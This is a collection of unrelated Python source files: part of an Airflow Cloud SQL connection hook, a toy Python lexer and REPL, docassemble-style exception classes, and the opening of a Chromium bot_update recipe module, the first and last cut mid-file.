                    "on Linux system. Either use shorter instance/database "
                    "name or switch to TCP connection. "
                    "The socket path for Cloud SQL proxy is now:"
                    "{}".format(UNIX_PATH_MAX, expected_path)
                )

    @staticmethod
    def _generate_unique_path() -> str:
        """
        We are not using mkdtemp here as the path generated with mkdtemp
        can be close to 60 characters and there is a limitation in
        length of socket path to around 100 characters in total.
        We append project/location/instance to it later and postgres
        appends its own prefix, so we chose a shorter "/tmp/[8 random characters]"
        """
        random.seed()
        while True:
            candidate = "/tmp/" + ''.join(
                random.choice(string.ascii_lowercase + string.digits) for _ in range(8)
            )
            if not os.path.exists(candidate):
                return candidate

    @staticmethod
    def _quote(value) -> Optional[str]:
        """URL-quote *value*, passing falsy values through as None."""
        return quote_plus(value) if value else None

    def _generate_connection_uri(self) -> str:
        """Build the database connection URI from the hook's configuration."""
        if self.use_proxy:
            if self.sql_proxy_use_tcp:
                if not self.sql_proxy_tcp_port:
                    self.reserve_free_tcp_port()
            if not self.sql_proxy_unique_path:
                self.sql_proxy_unique_path = self._generate_unique_path()
        if not self.database_type:
            raise ValueError("The database_type should be set")

        database_uris = CONNECTION_URIS[self.database_type]  # type: Dict[str, Dict[str, str]]
        ssl_spec = None
        socket_path = None
        if self.use_proxy:
            proxy_uris = database_uris['proxy']  # type: Dict[str, str]
            if self.sql_proxy_use_tcp:
                format_string = proxy_uris['tcp']
            else:
                format_string = proxy_uris['socket']
                socket_path = "{sql_proxy_socket_path}/{instance_socket_name}".format(
                    sql_proxy_socket_path=self.sql_proxy_unique_path,
                    instance_socket_name=self._get_instance_socket_name(),
                )
        else:
            public_uris = database_uris['public']  # type: Dict[str, str]
            if self.use_ssl:
                format_string = public_uris['ssl']
                ssl_spec = {'cert': self.sslcert, 'key': self.sslkey, 'ca': self.sslrootcert}
            else:
                format_string = public_uris['non-ssl']
        if not self.user:
            raise AirflowException("The login parameter needs to be set in connection")
        if not self.public_ip:
            # Fixed copy-paste mistake: this previously complained about 'location'.
            raise AirflowException("The host parameter needs to be set in connection")
        if not self.password:
            raise AirflowException("The password parameter needs to be set in connection")
        if not self.database:
            raise AirflowException("The database parameter needs to be set in connection")

        connection_uri = format_string.format(
            user=quote_plus(self.user) if self.user else '',
            password=quote_plus(self.password) if self.password else '',
            database=quote_plus(self.database) if self.database else '',
            public_ip=self.public_ip,
            public_port=self.public_port,
            proxy_port=self.sql_proxy_tcp_port,
            socket_path=self._quote(socket_path),
            ssl_spec=self._quote(json.dumps(ssl_spec)) if ssl_spec else '',
            client_cert_file=self._quote(self.sslcert) if self.sslcert else '',
            # Fixed copy-paste mistakes: the key/root-cert fields were gated
            # on self.sslcert instead of their own attributes.
            client_key_file=self._quote(self.sslkey) if self.sslkey else '',
            server_ca_file=self._quote(self.sslrootcert) if self.sslrootcert else '',
        )
        # Mask the password before logging the URI.
        self.log.info(
            "DB connection URI %s",
            connection_uri.replace(
                quote_plus(self.password) if self.password else 'PASSWORD', 'XXXXXXXXXXXX'
            ),
        )
        return connection_uri

    def _get_instance_socket_name(self) -> str:
        """Return the `<project>:<location>:<instance>` socket name."""
        return self.project_id + ":" + self.location + ":" + self.instance  # type: ignore

    def _get_sqlproxy_instance_specification(self) -> str:
        """Return the proxy `-instances` spec, adding `=tcp:<port>` when TCP is used."""
        instance_specification = self._get_instance_socket_name()
        if self.sql_proxy_use_tcp:
            instance_specification += "=tcp:" + str(self.sql_proxy_tcp_port)
        return instance_specification

    def create_connection(self) -> Connection:
        """
        Create Connection object, according to whether it uses proxy, TCP, UNIX sockets, SSL.
        Connection ID will be randomly generated.
        """
        uri = self._generate_connection_uri()
        connection = Connection(conn_id=self.db_conn_id, uri=uri)
        self.log.info("Creating connection %s", self.db_conn_id)
        return connection

    def get_sqlproxy_runner(self) -> CloudSqlProxyRunner:
        """
        Retrieve Cloud SQL Proxy runner. It is used to manage the proxy
        lifecycle per task.

        :return: The Cloud SQL Proxy runner.
        :rtype: CloudSqlProxyRunner
        """
        if not self.use_proxy:
            raise ValueError("Proxy runner can only be retrieved in case of use_proxy = True")
        if not self.sql_proxy_unique_path:
            raise ValueError("The sql_proxy_unique_path should be set")
        return CloudSqlProxyRunner(
            path_prefix=self.sql_proxy_unique_path,
            instance_specification=self._get_sqlproxy_instance_specification(),
            project_id=self.project_id,
            sql_proxy_version=self.sql_proxy_version,
            sql_proxy_binary_path=self.sql_proxy_binary_path,
            gcp_conn_id=self.gcp_conn_id,
        )

    def get_database_hook(self, connection: Connection) -> Union[PostgresHook, MySqlHook]:
        """
        Retrieve database hook. This is the actual Postgres or MySQL database hook
        that uses proxy or connects directly to the Google Cloud SQL database.
        """
        if self.database_type == 'postgres':
            self.db_hook = PostgresHook(connection=connection, schema=self.database)
        else:
            self.db_hook = MySqlHook(connection=connection, schema=self.database)
        return self.db_hook

    def cleanup_database_hook(self) -> None:
        """Clean up database hook after it was used."""
        if self.database_type == 'postgres':
            if not self.db_hook:
                raise ValueError("The db_hook should be set")
            if not isinstance(self.db_hook, PostgresHook):
                raise ValueError(f"The db_hook should be PostgresHook and is {type(self.db_hook)}")
            conn = getattr(self.db_hook, 'conn')
            if conn and conn.notices:
                for output in self.db_hook.conn.notices:
                    self.log.info(output)

    def reserve_free_tcp_port(self) -> None:
        """Reserve free TCP port to be used by Cloud SQL Proxy"""
        self.reserved_tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.reserved_tcp_socket.bind(('127.0.0.1', 0))
        self.sql_proxy_tcp_port = self.reserved_tcp_socket.getsockname()[1]

    def free_reserved_port(self) -> None:
        """Free TCP port. Makes it immediately ready to be used by Cloud SQL Proxy."""
        if self.reserved_tcp_socket:
            self.reserved_tcp_socket.close()
            self.reserved_tcp_socket = None
|
|
#!/usr/bin/env python
"""
a work in progress toy python interpreter
"""
# python 2/3 compatibility
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals
)
import sys

# On Python 2, alias raw_input to input so the REPL code below works
# identically on both major versions.
if sys.version_info < (3, 0):
    input = raw_input  # pylint: disable=redefined-builtin,invalid-name
class Token(object):  # pylint: disable=too-few-public-methods
    """ basic token, holds identifier along with human readable strings """

    def __init__(self, ident, string=None, value=None):
        self.ident = ident
        # default the display string to the ident's textual form
        self.string = str(ident) if string is None else string
        self.value = value

    def __repr__(self):
        if self.value is None:
            return '<{}>'.format(self.string)
        return '<{}, {}>'.format(self.string, self.value)

    def with_value(self, value):
        """ return a new token like self but with a specific value """
        return Token(self.ident, self.string, value)
class Lexer(object):
    """ convert input line into a stream of tokens

    Implemented as a state machine: ``self.state`` holds the current
    handler; each state either consumes characters (yielding tokens) or
    hands off to the next state in the chain
    indent -> whitespace -> newline -> comment -> line_continuation ->
    identifier -> number -> string -> operator -> delimiter.
    """

    # shared token singletons (class attributes, reused via with_value())
    # tokens
    nothing = Token(0)
    error = Token(1)
    error_indentation = Token(error.ident, 'IndentationError')
    error_syntax = Token(error.ident, 'SyntaxError', 'invalid syntax')
    newline = Token(100, 'newline')
    indent = Token(101, 'indent')
    dedent = Token(102, 'dedent')
    # identifiers
    identifier = Token(200, 'identifier')
    # keywords
    keyword = Token(300, 'keyword')
    keywords = ['False', 'None', 'True', 'and', 'as', 'assert', 'break',
                'class', 'continue', 'def', 'del', 'elif', 'else', 'except',
                'finally', 'for', 'from', 'global', 'if', 'import', 'in',
                'is', 'lambda', 'nonlocal', 'not', 'or', 'pass', 'raise',
                'return', 'try', 'while', 'with', 'yield']
    # literals
    literal_string = Token(400, 'literal_string')
    literal_integer = Token(401, 'literal_integer')
    literal_float = Token(402, 'literal_float')
    # operators
    operator = Token(500, 'operator')
    operators = ['+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&', '|',
                 '^', '~', '<', '>', '<=', '>=', '==', '!=']
    # delimiters
    delimiter = Token(600, 'delimiter')
    delimiters = ['(', ')', '[', ']', '{', '}', ',', ':', '.', ';', '=', '@']

    def __init__(self):
        # current state handler (a bound method); assigned by _reset()
        self.state = None
        # stack of indentation widths, innermost level at index 0
        self.indent = None
        # open-parenthesis depth; newlines are suppressed while > 0
        self.parens = None
        # remaining unlexed input text
        self.line = None
        # True when more input is needed to finish the current construct
        self.continuation = None
        self._reset()

    def _reset(self):
        """ reset full lexer state """
        self.state = self.state_indent
        self.indent = [0]
        self.parens = 0
        self.line = ''
        self.continuation = False

    def _peek(self, count):
        """
        get a list of length count with either character values or None
        do not modify current data
        """
        # NOTE: since self.line is a str, a successful peek returns a str
        # slice; only the not-enough-data case returns a list of None
        # (which compares unequal to any string the callers test against).
        if len(self.line) >= count:
            return self.line[:count]
        return [None] * count

    def _pop(self, count):
        """
        get a list of length count with either character values or None
        update current data by removing count values
        """
        if len(self.line) >= count:
            res = self._peek(count)
            self.line = self.line[count:]
            return res
        return [None] * count

    def lex(self, line):
        """ add another line to be lexed and run current state """
        # only add line if we are in a continuation or line is not empty
        if self.continuation is True or line.strip() != '':
            self.line += line
        self.continuation = False
        # keep running states until out of data or we need a continuation
        while self.continuation is False and len(self.line) > 0:
            for token in self.state():
                if token.ident == Lexer.error.ident:
                    yield token
                    # reset state on error
                    self._reset()
                    return
                yield token

    def state_indent(self):
        """ starting lex state for a new, non-continued line """
        # get indent level
        indent = 0
        while self._peek(1) == ' ' or self._peek(1) == '\t':
            indent += 1
            self._pop(1)
        # if new indent is larger, push it and generate indent token
        if indent > self.indent[0]:
            self.indent.insert(0, indent)
            yield Lexer.indent
        # if new indent is smaller, pop off the stack till we match
        while indent < self.indent[0]:
            self.indent = self.indent[1:]
            yield Lexer.dedent
        # make sure the new indent level matches a previous level
        if self.indent[0] != indent:
            yield Lexer.error_indentation.with_value(
                'unindent does not match any outer indentation level')
            return
        self.state = self.state_whitespace

    def state_whitespace(self):
        """ consume all whitespace, but don't generate tokens """
        while self._peek(1) == ' ' or self._peek(1) == '\t':
            self._pop(1)
        self.state = self.state_newline
        return []  # fake generator

    def state_newline(self):
        """ lex a newline, if found then go to starting state """
        if self._peek(1) == '\n':
            self._pop(1)
            if self.parens == 0:
                # only generate newline if we are not in a paren block
                yield Lexer.newline
                # go to starting state
                self.state = self.state_indent
            else:
                # we are in a paren block
                self.state = self.state_whitespace
        else:
            self.state = self.state_comment

    def state_comment(self):
        """ discard comments, turns into a newline and go to starting state"""
        if self._peek(1) == '#':
            # consume through the newline
            while self._pop(1) != '\n':
                pass
            yield Lexer.newline
            # go to starting state
            self.state = self.state_indent
        else:
            self.state = self.state_line_continuation

    def state_line_continuation(self):
        """ backslash means we need another line """
        if self._peek(2) == '\\\n':
            self._pop(2)
            self.continuation = True
            self.state = self.state_whitespace
        else:
            self.state = self.state_identifier
        return []  # fake generator

    def state_identifier(self):
        """ either an identifier or a keyword """
        if self._peek(1) in 'abcdefghijklmnopqrstuvwxyz' \
                'ABCDEFGHIJKLMNOPQRSTUVWXYZ_':
            identifier = ''
            # first char may not be a digit, but later chars may
            while self._peek(1) in 'abcdefghijklmnopqrstuvwxyz' \
                    'ABCDEFGHIJKLMNOPQRSTUVWXYZ_0123456789':
                identifier += self._pop(1)
            if identifier in Lexer.keywords:
                yield Lexer.keyword.with_value(identifier)
            else:
                yield Lexer.identifier.with_value(identifier)
            self.state = self.state_whitespace
        else:
            self.state = self.state_number

    def state_number(self):
        """ integer or float literal """
        # a number starts with a digit, or a dot followed by a digit
        if (self._peek(2)[0] == '.' and self._peek(2)[1] in '0123456789') or \
                self._peek(1) in '0123456789':
            number = ''
            token = Lexer.literal_integer
            while self._peek(1) in '0123456789.':
                char = self._pop(1)
                number += char
                # first dot turns the literal into a float ...
                if token.ident == Lexer.literal_integer.ident and \
                        char == '.':
                    token = Lexer.literal_float
                # ... a second dot is a syntax error
                elif char == '.':
                    yield Lexer.error_syntax
                    return
            yield token.with_value(number)
            self.state = self.state_whitespace
        else:
            self.state = self.state_string

    def state_string(self):
        """ long and short strings """
        quote = None
        # triple quotes must be checked before single ones
        if self._peek(3) == '\'\'\'' or self._peek(3) == '"""':
            quote = self._pop(3)
        elif self._peek(1) == '\'' or self._peek(1) == '"':
            quote = self._pop(1)
        else:
            self.state = self.state_operator
            return
        string = ''
        while self._peek(len(quote)) != quote:
            char = self._pop(1)
            # handle escape sequences
            # (only \\, \', \" and \t are recognized; any other backslash
            # sequence passes through verbatim)
            if char == '\\':
                char = self._peek(1)
                if char == '\\':
                    char = self._pop(1)
                elif char == '\'':
                    char = self._pop(1)
                elif char == '"':
                    char = self._pop(1)
                elif char == 't':
                    char = '\t'
                    self._pop(1)
            string += char
            if char == '\n' and len(quote) == 1:
                # short strings may not span lines
                yield Lexer.error_syntax.with_value(
                    'EOL while scanning string literal')
                return
            elif char == '\n' and len(self.line) == 0:
                # multi-line triple quote string, so reset and get more lines
                # NOTE: this seems a bit clumsy
                self.line = quote + string
                self.continuation = True
                return
        self._pop(len(quote))
        yield Lexer.literal_string.with_value(string)
        self.state = self.state_whitespace

    def state_operator(self):
        """ binary and unary operators """
        # two-character operators take precedence over one-character ones
        if self._peek(2) in Lexer.operators:
            yield Lexer.operator.with_value(self._pop(2))
            self.state = self.state_whitespace
        elif self._peek(1) in Lexer.operators:
            yield Lexer.operator.with_value(self._pop(1))
            self.state = self.state_whitespace
        else:
            self.state = self.state_delimiter

    def state_delimiter(self):
        """ lexer delimiters, some may be syntax operators """
        if self._peek(1) in Lexer.delimiters:
            # track paren depth so newlines inside parens are suppressed
            if self._peek(1) == '(':
                self.parens += 1
            elif self._peek(1) == ')':
                self.parens -= 1
            yield Lexer.delimiter.with_value(self._pop(1))
            # unmatched closing paren
            if self.parens < 0:
                yield Lexer.error_syntax
            self.state = self.state_whitespace
        else:
            self.state = self.state_whitespace  # no more states
class Parser(object):  # pylint: disable=too-few-public-methods
    """ lex and evaluate input lines """

    def __init__(self):
        self.lexer = Lexer()

    def parse(self, line):
        """ parse tokens line by line

        Returns '' when the line was handled, None when more input is
        needed to complete the current construct.
        """
        for token in self.lexer.lex(line):
            if token.ident != Lexer.error.ident:
                print(repr(token), end=' ')
                continue
            # the lexer reported an error: show a minimal traceback
            print("Traceback\n " + line)
            print(token)
            return ''
        print()
        # if we need another line, return None
        needs_more = self.lexer.continuation is True or self.lexer.parens > 0
        return None if needs_more else ''
def use_repl():
    """Run a read-parse loop on stdin until EOF (Ctrl-D)."""
    parser = Parser()
    prompt = '>'
    while True:
        print(prompt, end=' ')
        try:
            outcome = parser.parse(input() + '\n')
        except EOFError:
            print()
            break
        if outcome is None:
            # Lexer wants a continuation line.
            prompt = '.'
        else:
            if outcome != '':
                print(outcome)
            prompt = '>'
def use_file(filename):
    """Feed every line of *filename* through a fresh Parser."""
    parser = Parser()
    with open(filename) as source:
        for source_line in source:
            parser.parse(source_line)
if __name__ == '__main__':
    # With a filename argument, lex that file; otherwise run interactively.
    if len(sys.argv) > 1:
        use_file(sys.argv[1])
    else:
        use_repl()
|
|
import re
# Accepts a bare variable name: first character anything but a digit,
# remaining characters limited to letters, digits, and underscores.
valid_variable_match = re.compile(r'^[^\d][A-Za-z0-9\_]*$')
class DAIndexError(IndexError):
    """Project-specific IndexError subclass."""
    pass
class DAAttributeError(AttributeError):
    """Project-specific AttributeError subclass."""
    pass
class DAError(Exception):
    """General project error carrying a message and a numeric error code."""

    def __init__(self, value, code=501):
        super().__init__(value)
        self.value = value
        self.error_code = code

    def __str__(self):
        return str(self.value)
class DANotFoundError(Exception):
    """Project-specific exception for something that could not be found."""
    pass
class DAValidationError(Exception):
    """Raised inside input validation code when a field fails validation.

    The optional *field* records which field triggered the failure.
    """

    def __init__(self, *pargs, field=None):
        super().__init__(*pargs)
        self.field = field
class CodeExecute(Exception):
    """Carries code to execute (joined into one string) and its question."""

    def __init__(self, compute, question):
        super().__init__()
        # A list of statements is flattened into newline-separated source.
        if isinstance(compute, list):
            self.compute = "\n".join(compute)
        else:
            self.compute = compute
        self.question = question
class ForcedReRun(Exception):
    """Marker exception used as a control-flow signal (see call sites)."""
    pass
class LazyNameError(NameError):
    """NameError subclass distinguishing project-raised name errors."""
    pass
def invalid_variable_name(varname):
    """Return True when *varname* is not an acceptable variable reference.

    Rejects non-strings, names containing forbidden punctuation, and names
    whose base (before any '.' or '[') is not a valid identifier shape.
    """
    if not isinstance(varname, str):
        return True
    if re.search(r'[\n\r\(\)\{\}\*\^\#]', varname):
        return True
    # Validate only the base name; attribute/index suffixes are stripped.
    base_name = re.sub(r'[\.\[].*', '', varname)
    return not valid_variable_match.match(base_name)
class ForcedNameError(NameError):
    """NameError raised deliberately to force particular questions/actions.

    Positional arguments are either plain variable names (str) or dicts
    describing actions ('action'/'arguments', or one of 'undefine',
    'invalidate', 'recompute', 'set', 'follow up').  Keyword arguments:
    'user_dict' supplies the caller's variable store (used to capture
    iterator context), 'gathering' (bool) suppresses next_action.
    """
    def __init__(self, *pargs, **kwargs):
        the_args = list(pargs)
        if len(the_args) == 0:
            raise DAError("ForcedNameError must have at least one argument")
        # Capture loop/iterator variables from the caller's dict so queued
        # actions can later be replayed in the same context.
        the_context = {}
        the_user_dict = kwargs.get('user_dict', {})
        for var_name in ('x', 'i', 'j', 'k', 'l', 'm', 'n'):
            if var_name in the_user_dict:
                the_context[var_name] = the_user_dict[var_name]
        first_is_plain = bool(isinstance(the_args[0], str))
        self.next_action = []
        while len(the_args) > 0:
            arg = the_args.pop(0)
            if isinstance(arg, dict):
                if (len(arg.keys()) == 2 and 'action' in arg and 'arguments' in arg) or (len(arg.keys()) == 1 and 'action' in arg):
                    # NOTE(review): an empty context is attached here even
                    # though the_context was collected above -- confirm this
                    # is intended rather than arg['context'] = the_context.
                    arg['context'] = {}
                    self.set_action(arg)
                elif len(arg) == 1 and ('undefine' in arg or 'invalidate' in arg or 'recompute' in arg or 'set' in arg or 'follow up' in arg):
                    if 'set' in arg:
                        # Normalize a single dict to a one-element list.
                        if isinstance(arg['set'], dict):
                            arg['set'] = [arg['set']]
                        if not isinstance(arg['set'], list):
                            raise DAError("force_ask: the set statement must refer to a list.")
                        clean_list = []
                        for the_dict in arg['set']:
                            if not isinstance(the_dict, dict):
                                raise DAError("force_ask: a set command must refer to a list of dicts.")
                            for the_var, the_val in the_dict.items():
                                if not isinstance(the_var, str):
                                    raise DAError("force_ask: a set command must refer to a list of dicts with keys as variable names. ")
                                the_var_stripped = the_var.strip()
                                if invalid_variable_name(the_var_stripped):
                                    raise DAError("force_ask: missing or invalid variable name " + repr(the_var) + ".")
                                clean_list.append([the_var_stripped, the_val])
                        self.set_action(dict(action='_da_set', arguments=dict(variables=clean_list), context=the_context))
                    if 'follow up' in arg:
                        if isinstance(arg['follow up'], str):
                            arg['follow up'] = [arg['follow up']]
                        if not isinstance(arg['follow up'], list):
                            raise DAError("force_ask: the follow up statement must refer to a list.")
                        for var in arg['follow up']:
                            if not isinstance(var, str):
                                raise DAError("force_ask: invalid variable name " + repr(var) + " in follow up.")
                            var_saveas = var.strip()
                            if invalid_variable_name(var_saveas):
                                raise DAError("force_ask: missing or invalid variable name " + repr(var_saveas) + ".")
                            # Each follow-up variable becomes its own action.
                            self.set_action(dict(action=var, arguments={}, context=the_context))
                    for command in ('undefine', 'invalidate', 'recompute'):
                        if command not in arg:
                            continue
                        if isinstance(arg[command], str):
                            arg[command] = [arg[command]]
                        if not isinstance(arg[command], list):
                            raise DAError("force_ask: the " + command + " statement must refer to a list. ")
                        clean_list = []
                        for undef_var in arg[command]:
                            if not isinstance(undef_var, str):
                                raise DAError("force_ask: invalid variable name " + repr(undef_var) + " in " + command + ".")
                            undef_saveas = undef_var.strip()
                            if invalid_variable_name(undef_saveas):
                                raise DAError("force_ask: missing or invalid variable name " + repr(undef_saveas) + ".")
                            clean_list.append(undef_saveas)
                        if command == 'invalidate':
                            self.set_action(dict(action='_da_invalidate', arguments=dict(variables=clean_list), context=the_context))
                        else:
                            # 'undefine' and 'recompute' both undefine first.
                            self.set_action(dict(action='_da_undefine', arguments=dict(variables=clean_list), context=the_context))
                        if command == 'recompute':
                            # recompute = undefine followed by compute.
                            self.set_action(dict(action='_da_compute', arguments=dict(variables=clean_list), context=the_context))
                else:
                    raise DAError("Dictionaries passed to force_ask must have keys of 'action' and 'argument' only.")
            else:
                # Plain string: treat the variable name itself as the action.
                self.set_action(dict(action=arg, arguments={}, context=the_context))
        if kwargs.get('gathering', False):
            self.next_action = None
        if first_is_plain:
            self.arguments = None
        super().__init__()
    def set_action(self, data):
        # The first valid action also becomes this error's name/arguments.
        if not hasattr(self, 'name'):
            if isinstance(data, dict) and 'action' in data and (len(data) == 1 or 'arguments' in data):
                self.name = data['action']
                self.arguments = data.get('arguments', {})
                self.context = data.get('context', {})
            else:
                raise DAError("force_ask: invalid parameter " + repr(data))
        self.next_action.append(data)
class DAErrorNoEndpoint(DAError):
    """DAError variant for a missing endpoint."""
    pass
class DAErrorMissingVariable(DAError):
    """DAError raised when a required variable is undefined.

    Args:
        value: the error message.
        variable: name of the missing variable, if known.
        code: numeric error code (default 501).
    """

    def __init__(self, value, variable=None, code=501):
        # Pass code through to DAError.  The previous implementation set
        # self.error_code first and then called super().__init__(value),
        # which re-ran DAError.__init__ with its default code and silently
        # reset error_code to 501 regardless of the argument.
        super().__init__(value, code)
        self.variable = variable
class DAErrorCompileError(DAError):
    """DAError variant for a compilation failure."""
    pass
class MandatoryQuestion(Exception):
    """Signal exception carrying the fixed message 'Mandatory Question'."""

    def __init__(self):
        super().__init__()
        self.value = 'Mandatory Question'

    def __str__(self):
        return str(self.value)
class QuestionError(Exception):
    """Exception that presents a question screen.

    question/subquestion/url may be given positionally or as keywords;
    presentation flags (show_leave, show_exit, reload, show_restart,
    buttons, dead_end) are keyword-only and default to None.
    """

    def __init__(self, *pargs, **kwargs):
        self.question = pargs[0] if len(pargs) >= 1 else kwargs.get(
            'question', "Question not specified")
        self.subquestion = pargs[1] if len(pargs) >= 2 else kwargs.get('subquestion')
        self.url = pargs[2] if len(pargs) >= 3 else kwargs.get('url')
        # Optional presentation flags all default to None when absent.
        for flag in ('show_leave', 'show_exit', 'reload', 'show_restart',
                     'buttons', 'dead_end'):
            setattr(self, flag, kwargs.get(flag))
        super().__init__()

    def __str__(self):
        return str(self.question)
class BackgroundResponseError(Exception):
    """Exception whose payload becomes the background task's response.

    The payload shape depends on how it was constructed: mixed args and
    kwargs, multiple args, a single arg, or kwargs alone.
    """

    def __init__(self, *pargs, **kwargs):
        if pargs and kwargs:
            self.backgroundresponse = dict(pargs=list(pargs), kwargs=kwargs)
        elif len(pargs) > 1:
            self.backgroundresponse = list(pargs)
        elif len(pargs) == 1:
            self.backgroundresponse = pargs[0]
        else:
            self.backgroundresponse = kwargs
        if 'sleep' in kwargs:
            self.sleep = kwargs['sleep']
        super().__init__()

    def __str__(self):
        if not hasattr(self, 'backgroundresponse'):
            return "A BackgroundResponseError exception was thrown"
        return str(self.backgroundresponse)
class BackgroundResponseActionError(Exception):
    """Exception carrying an action dict built from the call arguments.

    The first positional argument (or None) becomes the action name and
    all keyword arguments become its arguments.
    """

    def __init__(self, *pargs, **kwargs):
        # Key insertion order ('arguments' then 'action') is preserved so
        # str() output matches the original representation.
        self.action = {
            'arguments': dict(kwargs),
            'action': pargs[0] if pargs else None,
        }
        super().__init__()

    def __str__(self):
        if not hasattr(self, 'action'):
            return "A BackgroundResponseActionError exception was thrown"
        return str(self.action)
class ResponseError(Exception):
    """Exception whose attributes describe an HTTP-style response.

    Exactly one payload attribute is set (response, binaryresponse,
    filename, url, or nullresponse); auxiliary keywords (response_code,
    sleep, all_variables, include_internal, content_type) are copied
    through when present.
    """

    def __init__(self, *pargs, **kwargs):
        payload_keys = ('response', 'binaryresponse', 'all_variables',
                        'file', 'url', 'null')
        if not pargs and not any(key in kwargs for key in payload_keys):
            self.response = "Empty Response"
        if pargs:
            self.response = pargs[0]
        elif 'response' in kwargs:
            self.response = kwargs['response']
        elif 'binaryresponse' in kwargs:
            self.binaryresponse = kwargs['binaryresponse']
        elif 'file' in kwargs:
            self.filename = kwargs['file']
        elif 'url' in kwargs:
            self.url = kwargs['url']
        elif 'null' in kwargs:
            self.nullresponse = kwargs['null']
        if kwargs.get('response_code') is not None:
            self.response_code = kwargs['response_code']
        for key in ('sleep', 'all_variables', 'include_internal', 'content_type'):
            if key in kwargs:
                setattr(self, key, kwargs[key])
        super().__init__()

    def __str__(self):
        if not hasattr(self, 'response'):
            return "A ResponseError exception was thrown"
        return str(self.response)
class CommandError(Exception):
    """Exception directing the interview to exit/restart/leave etc.

    The command comes from the first positional argument, the 'type'
    keyword, or defaults to 'exit'.
    """

    def __init__(self, *pargs, **kwargs):
        super().__init__()
        if pargs:
            self.return_type = pargs[0]
        else:
            self.return_type = kwargs.get('type', "exit")
        self.url = kwargs.get('url', '')
        self.sleep = kwargs.get('sleep', None)

    def __str__(self):
        return str(self.return_type)
class DAWebError(Exception):
    """Exception carrying arbitrary attributes describing a web failure."""

    def __init__(self, **kwargs):
        super().__init__()
        # Every keyword argument becomes an instance attribute.
        self.__dict__.update(kwargs)
|
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Recipe module to ensure a checkout is consistent on a bot."""
from recipe_engine import recipe_api
from PB.go.chromium.org.luci.buildbucket.proto import common as common_pb2
class BotUpdateApi(recipe_api.RecipeApi):
  """Recipe API wrapping bot_update.py to keep a gclient checkout consistent.

  Builds the bot_update command line from the gclient config and
  buildbucket input, runs it, and post-processes its JSON output
  (properties, output commit, patch failures, checkout path).
  """

  def __init__(self, properties, deps_revision_overrides, fail_patch, *args,
               **kwargs):
    self._deps_revision_overrides = deps_revision_overrides
    self._fail_patch = fail_patch
    # Cache of the 'properties' dict from the most recent bot_update run.
    self._last_returned_properties = {}
    super(BotUpdateApi, self).__init__(*args, **kwargs)

  def initialize(self):
    # bot_update supports at most one applied Gerrit change per build.
    assert len(self.m.buildbucket.build.input.gerrit_changes) <= 1, (
        'bot_update does not support more than one '
        'buildbucket.build.input.gerrit_changes')

  def __call__(self, name, cmd, **kwargs):
    """Wrapper for easy calling of bot_update."""
    assert isinstance(cmd, (list, tuple))
    bot_update_path = self.resource('bot_update.py')
    kwargs.setdefault('infra_step', True)

    # If a Git HTTP request is constantly below GIT_HTTP_LOW_SPEED_LIMIT
    # bytes/second for GIT_HTTP_LOW_SPEED_TIME seconds then such request will be
    # aborted. Otherwise, it would wait for global timeout to be reached.
    env = {
        'GIT_HTTP_LOW_SPEED_LIMIT': '102400',  # in bytes
        'GIT_HTTP_LOW_SPEED_TIME': 300,  # in seconds
    }
    with self.m.context(env=env):
      with self.m.depot_tools.on_path():
        return self.m.python(name, bot_update_path, cmd, **kwargs)

  @property
  def last_returned_properties(self):
    """Properties dict emitted by the most recent bot_update run."""
    return self._last_returned_properties

  def _get_commit_repo_path(self, commit, gclient_config):
    """Returns local path to the repo that the commit is associated with.

    The commit must be a self.m.buildbucket.common_pb2.GitilesCommit.
    If commit does not specify any repo, returns name of the first solution.

    Raises an InfraFailure if the commit specifies a repo unexpected by gclient.
    """
    assert gclient_config.solutions, 'gclient_config.solutions is empty'

    # if repo is not specified, choose the first solution.
    if not (commit.host and commit.project):
      return gclient_config.solutions[0].name
    assert commit.host and commit.project

    repo_url = self.m.gitiles.unparse_repo_url(commit.host, commit.project)
    repo_path = self.m.gclient.get_repo_path(
        repo_url, gclient_config=gclient_config)
    if not repo_path:
      raise self.m.step.InfraFailure(
          'invalid (host, project) pair in '
          'buildbucket.build.input.gitiles_commit: '
          '(%r, %r) does not match any of configured gclient solutions '
          'and not present in gclient_config.repo_path_map' % (
              commit.host, commit.project))

    return repo_path

  def ensure_checkout(self,
                      gclient_config=None,
                      suffix=None,
                      patch=True,
                      update_presentation=True,
                      patch_root=None,
                      with_branch_heads=False,
                      with_tags=False,
                      no_fetch_tags=False,
                      refs=None,
                      patch_oauth2=None,
                      oauth2_json=None,
                      use_site_config_creds=None,
                      clobber=False,
                      root_solution_revision=None,
                      rietveld=None,
                      issue=None,
                      patchset=None,
                      gerrit_no_reset=False,
                      gerrit_no_rebase_patch_ref=False,
                      disable_syntax_validation=False,
                      manifest_name=None,
                      patch_refs=None,
                      ignore_input_commit=False,
                      set_output_commit=False,
                      step_test_data=None,
                      **kwargs):
    """
    Args:
      gclient_config: The gclient configuration to use when running bot_update.
        If omitted, the current gclient configuration is used.
      no_fetch_tags: When true, the root git repo being checked out will not
        fetch any tags referenced from the references being fetched. When a repo
        has many references, it can become a performance bottleneck, so avoid
        tags if the checkout will not need them present.
      disable_syntax_validation: (legacy) Disables syntax validation for DEPS.
        Needed as migration paths for recipes dealing with older revisions,
        such as bisect.
      manifest_name: The name of the manifest to upload to LogDog. This must
        be unique for the whole build.
      ignore_input_commit: if True, ignore api.buildbucket.gitiles_commit.
        Exists for historical reasons. Please do not use.
      set_output_commit: if True, mark the checked out commit as the
        primary output commit of this build, i.e. call
        api.buildbucket.set_output_gitiles_commit.
        In case of multiple repos, the repo is the one specified in
        api.buildbucket.gitiles_commit or the first configured solution.
        When sorting builds by commit position, this commit will be used.
        Requires falsy ignore_input_commit.
      step_test_data: a null function that returns test bot_update.py output.
        Use test_api.output_json to generate test data.
    """
    # Deprecated parameters are asserted unset rather than silently ignored.
    assert use_site_config_creds is None, "use_site_config_creds is deprecated"
    assert rietveld is None, "rietveld is deprecated"
    assert issue is None, "issue is deprecated"
    assert patchset is None, "patchset is deprecated"
    assert patch_oauth2 is None, "patch_oauth2 is deprecated"
    assert oauth2_json is None, "oauth2_json is deprecated"
    assert not (ignore_input_commit and set_output_commit)
    refs = refs or []
    # We can re-use the gclient spec from the gclient module, since all the
    # data bot_update needs is already configured into the gclient spec.
    cfg = gclient_config or self.m.gclient.c
    assert cfg is not None, (
